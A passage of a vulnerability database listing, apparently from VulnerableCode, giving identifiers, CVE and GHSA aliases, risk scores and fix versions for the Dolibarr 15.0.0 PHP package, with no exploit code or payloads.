vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
aliases CVE-2022-0224, GHSA-j545-frh3-r9gq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z1ty-xypd-t3ct
Fixing_vulnerabilities
Risk_score10.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.5